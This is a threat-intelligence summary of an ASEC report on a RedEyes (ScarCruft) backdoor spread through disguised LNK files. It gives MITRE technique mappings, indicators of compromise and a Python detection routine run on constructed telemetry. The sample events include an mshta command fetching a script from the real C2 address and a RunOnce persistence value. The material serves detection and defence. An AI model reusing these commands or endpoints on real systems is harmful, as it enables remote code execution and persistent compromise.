Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft) – ASEC BLOG

ASEC confirms a backdoor that was previously distributed as CHM is now spread via LNK files, using mshta to fetch and execute remote scripts and to receive commands from a threat actor’s server. The LNK payload is delivered with other malware in compressed files, masquerades as a legitimate Excel document, and persists via RunOnce registry modifications while using PowerShell to run additional scripts.

Keypoints

  • The backdoor's shift from CHM to LNK distribution relies on mshta-based script execution and remote command retrieval.
  • The malicious LNK is uploaded to a regular website, paired with other malware inside a ZIP file.
  • The LNK file creates and executes a normal Excel document (Status Survey Table.xlsx) alongside a malicious BAT script in %Temp% via PowerShell.
  • Persistence is established by adding a RunOnce registry entry (BackupUserProfiles) to auto-run the BAT file.
  • The BAT drops additional payloads and executes a hex-encoded PowerShell command that talks to the attacker’s C2 servers.
  • C2 infrastructure involves HTTP endpoints (e.g., 75.119.136.207 and cafe24.com) for receiving commands and downloading scripts.

MITRE Techniques

  • [T1059.005] Mshta – The LNK executes additional scripts located at a specific URL through the mshta process. Quote: “…executes additional scripts located at a specific URL through the mshta process…”
  • [T1059.001] PowerShell – The LNK launches PowerShell to drop and run the malicious BAT, and the BAT in turn runs further PowerShell commands. Quote: “…PowerShell commands.”
  • [T1547.001] Registry Run Keys/Startup Folder – The BAT is registered to RunOnce to ensure persistence. Quote: “Registry path: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce” and “Value: C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat”
  • [T1112] Modify Registry – The malware registers in the registry to ensure continuous execution of the BAT file. Quote: “it is registered in the following registry to ensure continuous execution of the BAT file.”
  • [T1027] Obfuscated/Encoded Files and Information – The PowerShell command is obfuscated/encoded (e.g., Base64). Quote: “PowerShell command obfuscated in Base64 as shown below.”
  • [T1071.001] Web Protocols – The attacker communicates via HTTP(S) endpoints for C2 (receives commands and transmits results). Quote: “Receives commands from the threat actor” and “Transmits command execution results”
  • [T1036] Masquerading – The dropped Excel document impersonates a Korean public organization. Quote: “Status Survey Table.xlsx appears as a normal Excel document and impersonates a Korean public organization.”
  • [T1105] Ingress Tool Transfer – The malware downloads and executes additional files through PowerShell. Quote: “Downloads additional files in the received path.”
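As an added example (not code from the ASEC post), a Python triage routine that flags each stage listed in the key points and techniques above over constructed telemetry records: mshta fetching a URL, PowerShell dropping a BAT in %Temp% or carrying a hex-encoded command, a RunOnce value pointing at a BAT, and contact with the quoted C2 hosts. The event field names, the BAT filename in %Temp% and the sample hex-encoded command are assumptions; only the registry path, value name, C2 hosts and URL come from the report.

```python
import re
C2_HOSTS = {"75.119.136.207", "bian0151.cafe24.com"}  # C2 hosts quoted in the report, plain form
RUN_KEYS = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{2}){16,}(?![0-9a-fA-F])")  # 16+ bytes as hex
def decode_hex_runs(cmdline):
    """Return the printable decodings of long hex runs embedded in a command line."""
    decoded = []
    for m in HEX_RUN.finditer(cmdline):
        try:
            text = bytes.fromhex(m.group(0)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def hunt(events):
    """Flag each stage: mshta fetching a URL, PowerShell dropping a BAT in %Temp% or carrying
    a hex-encoded command, a Run/RunOnce value pointing at a BAT, contact with a known C2."""
    findings = []
    for e in events:
        if e["type"] == "process":
            image = e["image"].lower().rsplit("\\", 1)[-1]
            cmd = e["cmdline"]
            if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
                findings.append(("mshta_remote_script", cmd))
            elif image == "powershell.exe":
                if re.search(r"%temp%[^;]*\.bat", cmd, re.I):
                    findings.append(("powershell_drops_bat_in_temp", cmd))
                for text in decode_hex_runs(cmd):
                    findings.append(("powershell_hex_encoded", text))
        elif e["type"] == "registry":
            if RUN_KEYS.search(e["key"]) and re.search(r"cmd\.exe\s+/c\s+.*\.bat", e["data"], re.I):
                findings.append(("runonce_bat_persistence", f'{e["value"]} -> {e["data"]}'))
        elif e["type"] == "network" and e["dest"].lower() in C2_HOSTS:
            findings.append(("known_c2_contact", e["dest"]))
    return findings
# Constructed telemetry (not real logs) modelled on the chain; the BAT name in %Temp% is assumed.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_HEX = "Write-Output 'decoded'".encode().hex()  # stand-in for the real encoded command
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://75.119.136.207/config/bases/config.php"},
    {"type": "process", "image": PS, "cmdline": r'powershell -c "Start-Process %temp%\Status Survey Table.xlsx; cmd /c %temp%\dropped.bat"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "value": "BackupUserProfiles",
     "data": r"C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"},
    {"type": "process", "image": PS, "cmdline": f"powershell -c {SAMPLE_HEX}"},
    {"type": "network", "dest": "75.119.136.207"},
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmdline": r'EXCEL.EXE "%temp%\Status Survey Table.xlsx"'},  # benign
]
```

Running `hunt(SAMPLE_EVENTS)` yields five findings, one per malicious stage, and none for the benign Excel launch.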

Indicators of Compromise

  • [Hash] File hash – 0eb8db3cbde470407f942fd63afe42b8, 2d444b6f72c8327d1d155faa2cca7fd7, and 1 more hash
  • [IP] C2 IP address – 75.119.136.207
  • [URL] C2/config endpoints – hxxp://75.119.136[.]207/config/bases/config.php and hxxp://bian0151.cafe24[.]com/admin/board/1.html

Read more: https://asec.ahnlab.com/en/56756/